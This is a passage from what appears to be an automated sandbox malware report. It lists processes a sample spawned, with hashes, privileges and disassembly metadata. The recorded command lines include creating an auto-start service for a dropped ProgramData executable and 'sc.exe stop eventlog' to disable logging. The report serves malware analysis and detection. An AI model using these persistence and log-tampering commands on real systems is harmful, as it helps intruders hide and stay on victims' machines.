                      Path:C:\Windows\System32\conhost.exe
                      Wow64 process (32bit):false
                      Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                      Imagebase:0x7ff6ee680000
                      File size:862'208 bytes
                      MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                      Has elevated privileges:true
                      Has administrator privileges:true
                      Programmed in:C, C++ or other language
                      Has exited:true

                      General

                      Target ID:58
                      Start time:10:09:19
                      Start date:07/01/2025
                      Path:C:\Windows\System32\conhost.exe
                      Wow64 process (32bit):false
                      Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                      Imagebase:0x7ff6ee680000
                      File size:862'208 bytes
                      MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                      Has elevated privileges:true
                      Has administrator privileges:true
                      Programmed in:C, C++ or other language
                      Has exited:true

                      General

                      Target ID:59
                      Start time:10:09:20
                      Start date:07/01/2025
                      Path:C:\Windows\System32\winlogon.exe
                      Wow64 process (32bit):false
                      Commandline:winlogon.exe
                      Imagebase:0x7ff6cc5a0000
                      File size:906'240 bytes
                      MD5 hash:F8B41A1B3E569E7E6F990567F21DCE97
                      Has elevated privileges:true
                      Has administrator privileges:true
                      Programmed in:C, C++ or other language
                      Has exited:false

                      General

                      Target ID:60
                      Start time:10:09:20
                      Start date:07/01/2025
                      Path:C:\Windows\System32\sc.exe
                      Wow64 process (32bit):false
                      Commandline:C:\Windows\system32\sc.exe create "CKTJZLMO" binpath= "C:\ProgramData\wwuujrlkomwy\eejhedztifcv.exe" start= "auto"
                      Imagebase:0x7ff601a20000
                      File size:72'192 bytes
                      MD5 hash:3FB5CF71F7E7EB49790CB0E663434D80
                      Has elevated privileges:true
                      Has administrator privileges:true
                      Programmed in:C, C++ or other language
                      Has exited:true

                      General

                      Target ID:61
                      Start time:10:09:20
                      Start date:07/01/2025
                      Path:C:\Windows\System32\sc.exe
                      Wow64 process (32bit):false
                      Commandline:C:\Windows\system32\sc.exe create "CKTJZLMO" binpath= "C:\ProgramData\wwuujrlkomwy\eejhedztifcv.exe" start= "auto"
                      Imagebase:0x7ff601a20000
                      File size:72'192 bytes
                      MD5 hash:3FB5CF71F7E7EB49790CB0E663434D80
                      Has elevated privileges:true
                      Has administrator privileges:true
                      Programmed in:C, C++ or other language
                      Has exited:true

                      General

                      Target ID:62
                      Start time:10:09:20
                      Start date:07/01/2025
                      Path:C:\Windows\System32\conhost.exe
                      Wow64 process (32bit):false
                      Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                      Imagebase:0x7ff6ee680000
                      File size:862'208 bytes
                      MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                      Has elevated privileges:true
                      Has administrator privileges:true
                      Programmed in:C, C++ or other language
                      Has exited:true

                      General

                      Target ID:63
                      Start time:10:09:20
                      Start date:07/01/2025
                      Path:C:\Windows\System32\conhost.exe
                      Wow64 process (32bit):false
                      Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                      Imagebase:0x7ff6ee680000
                      File size:862'208 bytes
                      MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                      Has elevated privileges:true
                      Has administrator privileges:true
                      Programmed in:C, C++ or other language
                      Has exited:true

                      General

                      Target ID:64
                      Start time:10:09:20
                      Start date:07/01/2025
                      Path:C:\Windows\System32\sc.exe
                      Wow64 process (32bit):false
                      Commandline:C:\Windows\system32\sc.exe stop eventlog
                      Imagebase:0x7ff601a20000
                      File size:72'192 bytes
                      MD5 hash:3FB5CF71F7E7EB49790CB0E663434D80
                      Has elevated privileges:true
                      Has administrator privileges:true
                      Programmed in:C, C++ or other language
                      Has exited:true

                      General

                      Target ID:65
                      Start time:10:09:20
                      Start date:07/01/2025
                      Path:C:\Windows\System32\sc.exe
                      Wow64 process (32bit):false
                      Commandline:C:\Windows\system32\sc.exe start "CKTJZLMO"
                      Imagebase:0x7ff601a20000
                      File size:72'192 bytes
                      MD5 hash:3FB5CF71F7E7EB49790CB0E663434D80
                      Has elevated privileges:true
                      Has administrator privileges:true
                      Programmed in:C, C++ or other language
                      Has exited:true

                      General

                      Target ID:66
                      Start time:10:09:20
                      Start date:07/01/2025
                      Path:C:\Windows\System32\conhost.exe
                      Wow64 process (32bit):false
                      Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                      Imagebase:0x7ff6ee680000
                      File size:862'208 bytes
                      MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                      Has elevated privileges:true
                      Has administrator privileges:true
                      Programmed in:C, C++ or other language
                      Has exited:true

                      General

                      Target ID:67
                      Start time:10:09:20
                      Start date:07/01/2025
                      Path:C:\Windows\System32\conhost.exe
                      Wow64 process (32bit):false
                      Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                      Imagebase:0x7ff6ee680000
                      File size:862'208 bytes
                      MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                      Has elevated privileges:true
                      Has administrator privileges:true
                      Programmed in:C, C++ or other language
                      Has exited:true

                      General

                      Target ID:68
                      Start time:10:09:20
                      Start date:07/01/2025
                      Path:C:\ProgramData\wwuujrlkomwy\eejhedztifcv.exe
                      Wow64 process (32bit):false
                      Commandline:C:\ProgramData\wwuujrlkomwy\eejhedztifcv.exe
                      Imagebase:0x7ff613710000
                      File size:5'471'744 bytes
                      MD5 hash:7D6398EBFB82A24748617189BF4AD691
                      Has elevated privileges:true
                      Has administrator privileges:true
                      Programmed in:C, C++ or other language
                      Antivirus matches:
                      • Detection: 74%, ReversingLabs
                      Has exited:true

                      General

                      Target ID:69
                      Start time:10:09:20
                      Start date:07/01/2025
                      Path:C:\Windows\System32\sc.exe
                      Wow64 process (32bit):false
                      Commandline:C:\Windows\system32\sc.exe stop eventlog
                      Imagebase:0x7ff601a20000
                      File size:72'192 bytes
                      MD5 hash:3FB5CF71F7E7EB49790CB0E663434D80
                      Has elevated privileges:true
                      Has administrator privileges:true
                      Programmed in:C, C++ or other language
                      Has exited:true

                      General

                      Target ID:70
                      Start time:10:09:20
                      Start date:07/01/2025
                      Path:C:\Windows\System32\sc.exe
                      Wow64 process (32bit):false
                      Commandline:C:\Windows\system32\sc.exe start "CKTJZLMO"
                      Imagebase:0x7ff601a20000
                      File size:72'192 bytes
                      MD5 hash:3FB5CF71F7E7EB49790CB0E663434D80
                      Has elevated privileges:true
                      Has administrator privileges:true
                      Programmed in:C, C++ or other language
                      Has exited:true

                      General

                      Target ID:71
                      Start time:10:09:20
                      Start date:07/01/2025
                      Path:C:\Windows\System32\conhost.exe
                      Wow64 process (32bit):false
                      Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                      Imagebase:0x7ff6ee680000
                      File size:862'208 bytes
                      MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                      Has elevated privileges:true
                      Has administrator privileges:true
                      Programmed in:C, C++ or other language
                      Has exited:true

                      General

                      Target ID:72
                      Start time:10:09:20
                      Start date:07/01/2025
                      Path:C:\Windows\System32\conhost.exe
                      Wow64 process (32bit):false
                      Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                      Imagebase:0x7ff6ee680000
                      File size:862'208 bytes
                      MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                      Has elevated privileges:true
                      Has administrator privileges:true
                      Programmed in:C, C++ or other language
                      Has exited:true

                      General

                      Target ID:73
                      Start time:10:09:20
                      Start date:07/01/2025
                      Path:C:\Windows\System32\lsass.exe
                      Wow64 process (32bit):false
                      Commandline:C:\Windows\system32\lsass.exe
                      Imagebase:0x7ff6b5fa0000
                      File size:59'456 bytes
                      MD5 hash:A1CC00332BBF370654EE3DC8CDC8C95A
                      Has elevated privileges:true
                      Has administrator privileges:true
                      Programmed in:C, C++ or other language
                      Has exited:false

                      General

                      Target ID:74
                      Start time:10:09:21
                      Start date:07/01/2025
                      Path:C:\Windows\System32\svchost.exe
                      Wow64 process (32bit):false
                      Commandline:C:\Windows\system32\svchost.exe -k DcomLaunch -p -s LSM
                      Imagebase:0x7ff67e6d0000
                      File size:55'320 bytes
                      MD5 hash:B7F884C1B74A263F746EE12A5F7C9F6A
                      Has elevated privileges:true
                      Has administrator privileges:true
                      Programmed in:C, C++ or other language
                      Has exited:false

                      General

                      Target ID:75
                      Start time:10:09:21
                      Start date:07/01/2025
                      Path:C:\Windows\System32\dwm.exe
                      Wow64 process (32bit):false
                      Commandline:"dwm.exe"
                      Imagebase:0x7ff7751a0000
                      File size:94'720 bytes
                      MD5 hash:5C27608411832C5B39BA04E33D53536C
                      Has elevated privileges:false
                      Has administrator privileges:false
                      Programmed in:C, C++ or other language
                      Has exited:false

                      Disassembly

                      Reset < >

                        Execution Graph

                        Execution Coverage:80.5%
                        Dynamic/Decrypted Code Coverage:0%
                        Signature Coverage:7.1%
                        Total number of Nodes:28
                        Total number of Limit Nodes:1

                        Callgraph

                        • Executed
                        • Not Executed
                        • Opacity -> Relevance
                        • Disassembly available
                        callgraph 0 Function_00401000 1 Function_00401410 2 Function_004014D1 4 Function_0040145B 2->4 3 Function_004013B4 4->1 4->3 5 Function_0040108C 4->5 5->0

                        Executed Functions

                        Function 004014D1 Relevance: 9.1, APIs: 6, Instructions: 57COMMON
                        Download Yara Rule

                        Control-flow Graph

                        APIs
                        Memory Dump Source
                        • Source File: 00000000.00000002.1446334630.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                        • Associated: 00000000.00000002.1446321460.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1446358805.0000000000402000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1446358805.0000000000E02000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1447294458.0000000000E73000.00000002.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_400000_kx new.jbxd
                        Similarity
                        • API ID: ExceptionFilterUnhandled__getmainargs__set_app_type_controlfpexitmemset
                        • String ID:
                        • API String ID: 3649950142-0
                        • Opcode ID: 52dce7b4c269adca2e135b0b260f3394da02cf0dcd0238186c5a4fef22fa7b26
                        • Instruction ID: 276d267c830fb1744484ad8078350a7426bd4a7cdf1eb4e40a6b3a9487509305
                        • Opcode Fuzzy Hash: 52dce7b4c269adca2e135b0b260f3394da02cf0dcd0238186c5a4fef22fa7b26
                        • Instruction Fuzzy Hash: 2B11ECF5A00204AFCB00EBA9DC55F4A73ECE748304F144475F909F7361E579E9888B65
                        Function 0040108C Relevance: 31.7, APIs: 11, Strings: 7, Instructions: 239filestringCOMMON
                        Download Yara Rule

                        Control-flow Graph

                        APIs
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.1446334630.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                        • Associated: 00000000.00000002.1446321460.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1446358805.0000000000402000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1446358805.0000000000E02000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1447294458.0000000000E73000.00000002.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_400000_kx new.jbxd
                        Similarity
                        • API ID: ExecuteShellmemset$fclosefopenfwritegetenvmallocsprintfstrcmpstrcpy
                        • String ID: ! @$%s\%s$& @$1 @$`!@$e!@$t!@
                        • API String ID: 3236948872-2690058073
                        • Opcode ID: f45ba74685a2dc3ad5a1e5aaf52b6cc29edc716cfb621912138e64ca51a8567c
                        • Instruction ID: 915970d7f8feda4f52418ac8c3b3d67a18a16e2b2df1165333ea2636041f6ec6
                        • Opcode Fuzzy Hash: f45ba74685a2dc3ad5a1e5aaf52b6cc29edc716cfb621912138e64ca51a8567c
                        • Instruction Fuzzy Hash: 888101F1E001149BDB54DBACDC45B9E77A9EB48309F040579F109FB392E63DAE448B68
                        Function 00401000 Relevance: 3.0, APIs: 1, Strings: 1, Instructions: 50COMMON
                        Download Yara Rule

                        Control-flow Graph

                        • Executed
                        • Not Executed
                        control_flow_graph 28 401000-40102e malloc 29 401031-401039 28->29 30 401087-40108b 29->30 31 40103f-401085 29->31 31->29
                        APIs
                        Strings
                        • />pj)w^wi!p&370^jskbtm-=lzrjeh2*, xrefs: 0040106E
                        Memory Dump Source
                        • Source File: 00000000.00000002.1446334630.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                        • Associated: 00000000.00000002.1446321460.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1446358805.0000000000402000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1446358805.0000000000E02000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1447294458.0000000000E73000.00000002.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_400000_kx new.jbxd
                        Similarity
                        • API ID: malloc
                        • String ID: />pj)w^wi!p&370^jskbtm-=lzrjeh2*
                        • API String ID: 2803490479-4076278676
                        • Opcode ID: 6b0f6023af0dde842a795475da203acb5dc2305be251553dc905807124ae4844
                        • Instruction ID: 73f043a98e2a7ee5c63033fe1d48318bea4b72fbf4f694dacf033b8f0cb0a464
                        • Opcode Fuzzy Hash: 6b0f6023af0dde842a795475da203acb5dc2305be251553dc905807124ae4844
                        • Instruction Fuzzy Hash: FA11CCB0E05648EFCB08CFACD5907ADBBF1AF49304F1480AAE856E7391D635AE41DB45
                        Function 0040145B Relevance: 2.5, Strings: 2, Instructions: 30COMMON
                        Download Yara Rule

                        Control-flow Graph

                        • Executed
                        • Not Executed
                        control_flow_graph 34 40145b-4014ae call 4013b4 call 40108c call 401410
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.1446334630.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                        • Associated: 00000000.00000002.1446321460.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1446358805.0000000000402000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1446358805.0000000000E02000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1447294458.0000000000E73000.00000002.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_400000_kx new.jbxd
                        Similarity
                        • API ID: memset$ExecuteShellstrcmp
                        • String ID: D`GuD`Gu$D`GuD`Gu
                        • API String ID: 1389483452-1111891142
                        • Opcode ID: 922b65df33b6ed7bcce59c6e1f11fdccde716ae67d3a0a1bab3ccac911db9833
                        • Instruction ID: 76c1b6daecc4063cf20948b66e9e7b3ce613b504874fb2aeec9fcfb98b4de26b
                        • Opcode Fuzzy Hash: 922b65df33b6ed7bcce59c6e1f11fdccde716ae67d3a0a1bab3ccac911db9833
                        • Instruction Fuzzy Hash: 9AF09E75A00208AFCB40EFADD981D8A77F8AB4C304F1044A5FD48E7351D674E9848B55

                        Execution Graph

                        Execution Coverage:6.2%
                        Dynamic/Decrypted Code Coverage:0%
                        Signature Coverage:0%
                        Total number of Nodes:3
                        Total number of Limit Nodes:0
                        execution_graph 21855 8bc6428 21856 8bc646b SetThreadToken 21855->21856 21857 8bc6499 21856->21857

                        Executed Functions

                        Function 04F1B570 Relevance: .3, Instructions: 257COMMON
                        Download Yara Rule

                        Control-flow Graph

                        • Executed
                        • Not Executed
                        control_flow_graph 790 4f1b570-4f1b599 791 4f1b59b 790->791 792 4f1b59e-4f1b8d9 call 4f1ab94 790->792 791->792 853 4f1b8de-4f1b8e5 792->853
                        Memory Dump Source
                        • Source File: 00000002.00000002.1469127224.0000000004F10000.00000040.00000800.00020000.00000000.sdmp, Offset: 04F10000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_2_2_4f10000_powershell.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: 626a5f55ebbe8238e348b47c970b43b91c5ba74aff668c14bd5493da4cbab1ba
                        • Instruction ID: bb96f4cf23a9cbc8b969b0349678b2a282b93fb8bf3b0a0f8c18952b29693795
                        • Opcode Fuzzy Hash: 626a5f55ebbe8238e348b47c970b43b91c5ba74aff668c14bd5493da4cbab1ba
                        • Instruction Fuzzy Hash: 53918E70F007559BEB15EFB498505AEBBB3EFC4601B00892DD506AB384EF35AE068BD5
                        Function 04F1B580 Relevance: .3, Instructions: 252COMMON
                        Download Yara Rule

                        Control-flow Graph

                        • Executed
                        • Not Executed
                        control_flow_graph 854 4f1b580-4f1b599 855 4f1b59b 854->855 856 4f1b59e-4f1b8d9 call 4f1ab94 854->856 855->856 917 4f1b8de-4f1b8e5 856->917
                        Memory Dump Source
                        • Source File: 00000002.00000002.1469127224.0000000004F10000.00000040.00000800.00020000.00000000.sdmp, Offset: 04F10000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_2_2_4f10000_powershell.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: b718c3843d6ee08bbad53823964e1f2343781b45c114e6d6aaa5693318afc311
                        • Instruction ID: 8548e76f4f156acde09300fd8fff964cd9b72bf61a279260393539dfdc0983f1
                        • Opcode Fuzzy Hash: b718c3843d6ee08bbad53823964e1f2343781b45c114e6d6aaa5693318afc311
                        • Instruction Fuzzy Hash: 8B918E70F00715DBEB19EFB498515AEBBA3EFC4601B00892CD506AB384EF356E068BD5
                        Function 07A52308 Relevance: 8.2, Strings: 6, Instructions: 663COMMON
                        Download Yara Rule
                        Strings
                        Memory Dump Source
                        • Source File: 00000002.00000002.1489129914.0000000007A50000.00000040.00000800.00020000.00000000.sdmp, Offset: 07A50000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_2_2_7a50000_powershell.jbxd
                        Similarity
                        • API ID:
                        • String ID: pi\k$pi\k$pi\k$pi\k$pi\k$|,^k
                        • API String ID: 0-2199735641
                        • Opcode ID: 3500beef21e8a663d90226b977a69ee69440b8cd842730383f5a3fa754273788
                        • Instruction ID: f4d33aa8d8642a38e767344c039df952d98540729d0022b7ecb4c18fd178964c
                        • Opcode Fuzzy Hash: 3500beef21e8a663d90226b977a69ee69440b8cd842730383f5a3fa754273788
                        • Instruction Fuzzy Hash: E622E4F1B00306DFDB24DF6884407AABBE5FFC9221F04806ADD259B691DB35D951CBA2
                        Function 08BC6420 Relevance: 1.6, APIs: 1, Instructions: 51threadCOMMON
                        Download Yara Rule

                        Control-flow Graph

                        • Executed
                        • Not Executed
                        control_flow_graph 216 8bc6420-8bc6463 218 8bc646b-8bc6497 SetThreadToken 216->218 219 8bc6499-8bc649f 218->219 220 8bc64a0-8bc64bd 218->220 219->220
                        APIs
                        Memory Dump Source
                        • Source File: 00000002.00000002.1493947059.0000000008BC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 08BC0000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_2_2_8bc0000_powershell.jbxd
                        Similarity
                        • API ID: ThreadToken
                        • String ID:
                        • API String ID: 3254676861-0
                        • Opcode ID: 3d75088cbd5ebb718520be6ca9ad8b4a0ac69a69cfcae4537596649178e1e3e6
                        • Instruction ID: a9952ffd60a469ad4606eda5cdc2c27f85ea2e75734bbd81fa296cef717dfc5d
                        • Opcode Fuzzy Hash: 3d75088cbd5ebb718520be6ca9ad8b4a0ac69a69cfcae4537596649178e1e3e6
                        • Instruction Fuzzy Hash: 731146759003498FDB10DFAAC484B9EFFF8EB89224F14845DD158A3210C774A844CFA0
                        Function 08BC6428 Relevance: 1.5, APIs: 1, Instructions: 48threadCOMMON
                        Download Yara Rule

                        Control-flow Graph

                        • Executed
                        • Not Executed
                        control_flow_graph 223 8bc6428-8bc6497 SetThreadToken 225 8bc6499-8bc649f 223->225 226 8bc64a0-8bc64bd 223->226 225->226
                        APIs
                        Memory Dump Source
                        • Source File: 00000002.00000002.1493947059.0000000008BC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 08BC0000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_2_2_8bc0000_powershell.jbxd
                        Similarity
                        • API ID: ThreadToken
                        • String ID:
                        • API String ID: 3254676861-0
                        • Opcode ID: 6e4d62ec6c8a185c689eccbfeae36cbd8243488d62c32127153059227bf1b080
                        • Instruction ID: 1cf4b03f671f200e31d64b3fb5e577d5f114eb6cdeeb8af42442d2c06fc944a8
                        • Opcode Fuzzy Hash: 6e4d62ec6c8a185c689eccbfeae36cbd8243488d62c32127153059227bf1b080
                        • Instruction Fuzzy Hash: D51133B59003098FDB10DF9AC884B9EFBF8EB88724F24841ED418A3310C778A944CFA4
                        Function 07A53CE8 Relevance: .6, Instructions: 596COMMON
                        Download Yara Rule
                        Memory Dump Source
                        • Source File: 00000002.00000002.1489129914.0000000007A50000.00000040.00000800.00020000.00000000.sdmp, Offset: 07A50000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_2_2_7a50000_powershell.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: d820d86ef19b1ee5ab118070c8c927b102b342b7e62f8efa34f0208a55e13104
                        • Instruction ID: ef685f9d1b77bba5fadf0dae2a63ebee2a18664dd7b4f0076b8cba41ce7de0f2
                        • Opcode Fuzzy Hash: d820d86ef19b1ee5ab118070c8c927b102b342b7e62f8efa34f0208a55e13104
                        • Instruction Fuzzy Hash: 4D1289B17043559FDB159F6898007AABBB2AFCA254F24C47ADD25CF291CB31CC81C7A1
                        Function 04F129F0 Relevance: .2, Instructions: 208COMMON
                        Download Yara Rule

                        Control-flow Graph

                        • Executed
                        • Not Executed
                        control_flow_graph 918 4f129f0-4f12a1e 919 4f12af5-4f12b37 918->919 920 4f12a24-4f12a3a 918->920 925 4f12c51-4f12c67 919->925 926 4f12b3d-4f12b56 919->926 921 4f12a3c 920->921 922 4f12a3f-4f12a52 920->922 921->922 922->919 927 4f12a58-4f12a65 922->927 928 4f12b58 926->928 929 4f12b5b-4f12b69 926->929 930 4f12a67 927->930 931 4f12a6a-4f12a7c 927->931 928->929 929->925 935 4f12b6f-4f12b79 929->935 930->931 931->919 939 4f12a7e-4f12a88 931->939 937 4f12b87-4f12b94 935->937 938 4f12b7b-4f12b7d 935->938 937->925 940 4f12b9a-4f12baa 937->940 938->937 941 4f12a96-4f12aa6 939->941 942 4f12a8a-4f12a8c 939->942 944 4f12bac 940->944 945 4f12baf-4f12bbd 940->945 941->919 943 4f12aa8-4f12ab2 941->943 942->941 946 4f12ac0-4f12af4 943->946 947 4f12ab4-4f12ab6 943->947 944->945 945->925 950 4f12bc3-4f12bd3 945->950 947->946 951 4f12bd5 950->951 952 4f12bd8-4f12be5 950->952 951->952 952->925 955 4f12be7-4f12bf7 952->955 956 4f12bf9 955->956 957 4f12bfc-4f12c08 955->957 956->957 957->925 959 4f12c0a-4f12c24 957->959 960 4f12c26 959->960 961 4f12c29 959->961 960->961 962 4f12c2e-4f12c38 961->962 963 4f12c3d-4f12c50 962->963
                        Memory Dump Source
                        • Source File: 00000002.00000002.1469127224.0000000004F10000.00000040.00000800.00020000.00000000.sdmp, Offset: 04F10000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_2_2_4f10000_powershell.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: a0094a8d4e89ec03b81ab06033601d7d4bb40f9973c61b62eeee4befa0243847
                        • Instruction ID: 07756b46aa0fe8d16d66b9affeb5a1899ac3ac2dc78883bae5f2f20e0f3ec43d
                        • Opcode Fuzzy Hash: a0094a8d4e89ec03b81ab06033601d7d4bb40f9973c61b62eeee4befa0243847
                        • Instruction Fuzzy Hash: 39917C74A002058FCB19CF99C4D4AAEFBB1FF88310B258599D955AB365C735FC52CBA0
                        Function 04F1BBA0 Relevance: .2, Instructions: 156COMMON
                        Download Yara Rule

                        Control-flow Graph

                        • Executed
                        • Not Executed
                        control_flow_graph 1141 4f1bba0-4f1bba8 1142 4f1bbdb-4f1bc40 1141->1142 1143 4f1bbaa-4f1bbd5 1141->1143 1147 4f1bc42 1142->1147 1148 4f1bc46-4f1bc51 1142->1148 1143->1142 1147->1148 1149 4f1bc53 1148->1149 1150 4f1bc56-4f1bcb0 call 4f1b088 1148->1150 1149->1150 1157 4f1bd01-4f1bd05 1150->1157 1158 4f1bcb2-4f1bcb7 1150->1158 1159 4f1bd07-4f1bd11 1157->1159 1160 4f1bd16 1157->1160 1158->1157 1161 4f1bcb9-4f1bcdc 1158->1161 1159->1160 1162 4f1bd1b-4f1bd1d 1160->1162 1163 4f1bce2-4f1bced 1161->1163 1164 4f1bd42-4f1bd45 call 4f1a870 1162->1164 1165 4f1bd1f-4f1bd40 1162->1165 1166 4f1bcf6-4f1bcff 1163->1166 1167 4f1bcef-4f1bcf5 1163->1167 1169 4f1bd4a-4f1bd4e 1164->1169 1165->1169 1166->1162 1167->1166 1172 4f1bd50-4f1bd79 1169->1172 1173 4f1bd87-4f1bdb6 1169->1173 1172->1173
                        Memory Dump Source
                        • Source File: 00000002.00000002.1469127224.0000000004F10000.00000040.00000800.00020000.00000000.sdmp, Offset: 04F10000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_2_2_4f10000_powershell.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: fc022e90c537bc5841e23c5292bef59b27fc70484bc5c996f6ebd20843c001f2
                        • Instruction ID: 7a3932bca9a1e119e1750c999d7be87f052fc6f8e7d18efd17ae5239841c4cc4
                        • Opcode Fuzzy Hash: fc022e90c537bc5841e23c5292bef59b27fc70484bc5c996f6ebd20843c001f2
                        • Instruction Fuzzy Hash: 2D613971E00248DFDB15CFA9D484A8DFBF1FF88310F15816AE809AB365EB34A846CB50
                        Function 04F1BBB0 Relevance: .2, Instructions: 155COMMON
                        Download Yara Rule

                        Control-flow Graph

                        • Executed
                        • Not Executed
                        control_flow_graph 1182 4f1bbb0-4f1bc40 1186 4f1bc42 1182->1186 1187 4f1bc46-4f1bc51 1182->1187 1186->1187 1188 4f1bc53 1187->1188 1189 4f1bc56-4f1bcb0 call 4f1b088 1187->1189 1188->1189 1196 4f1bd01-4f1bd05 1189->1196 1197 4f1bcb2-4f1bcb7 1189->1197 1198 4f1bd07-4f1bd11 1196->1198 1199 4f1bd16 1196->1199 1197->1196 1200 4f1bcb9-4f1bcdc 1197->1200 1198->1199 1201 4f1bd1b-4f1bd1d 1199->1201 1202 4f1bce2-4f1bced 1200->1202 1203 4f1bd42-4f1bd45 call 4f1a870 1201->1203 1204 4f1bd1f-4f1bd40 1201->1204 1205 4f1bcf6-4f1bcff 1202->1205 1206 4f1bcef-4f1bcf5 1202->1206 1208 4f1bd4a-4f1bd4e 1203->1208 1204->1208 1205->1201 1206->1205 1211 4f1bd50-4f1bd79 1208->1211 1212 4f1bd87-4f1bdb6 1208->1212 1211->1212
                        Memory Dump Source
                        • Source File: 00000002.00000002.1469127224.0000000004F10000.00000040.00000800.00020000.00000000.sdmp, Offset: 04F10000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_2_2_4f10000_powershell.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: 696605e60e65604f8e86a151ea53702872808b9acc12dcb05f21b1b74ea401f6
                        • Instruction ID: acb86804b31970de780ca7780c14ee8b3fa70a2097ef611bea565a62ddfd5f1c
                        • Opcode Fuzzy Hash: 696605e60e65604f8e86a151ea53702872808b9acc12dcb05f21b1b74ea401f6
                        • Instruction Fuzzy Hash: 6161F471E00249DFDB14DFA9D584B9DFBF1EF98310F15812AE808AB264EB74AD46CB50
                        Function 04F17808 Relevance: .2, Instructions: 153COMMON
                        Download Yara Rule
                        Memory Dump Source
                        • Source File: 00000002.00000002.1469127224.0000000004F10000.00000040.00000800.00020000.00000000.sdmp, Offset: 04F10000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_2_2_4f10000_powershell.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: 81aa2210c6e4454628eaa13610cada2dbe76294fa18da0338088b2ecba38931a
                        • Instruction ID: 8fd61e7e9ed8461316521b34e91f13571666211e6ce3ea3f5f2261bc5af50967
                        • Opcode Fuzzy Hash: 81aa2210c6e4454628eaa13610cada2dbe76294fa18da0338088b2ecba38931a
                        • Instruction Fuzzy Hash: C2519E317042049FD708AB69D854B6A77EAFFC9265F248469E50ECB365EB35EC02CB90
                        Function 07A53CCD Relevance: .1, Instructions: 121COMMON
                        Download Yara Rule
                        Memory Dump Source
                        • Source File: 00000002.00000002.1489129914.0000000007A50000.00000040.00000800.00020000.00000000.sdmp, Offset: 07A50000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_2_2_7a50000_powershell.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: c844647a0213b6e9990b26895fc59c2431bccd000fee1927c4e788e120c651dc
                        • Instruction ID: 6e74601715f16537fe653a008c7f0197fc343f3ea4da77744f7dfdbda79ff5dd
                        • Opcode Fuzzy Hash: c844647a0213b6e9990b26895fc59c2431bccd000fee1927c4e788e120c651dc
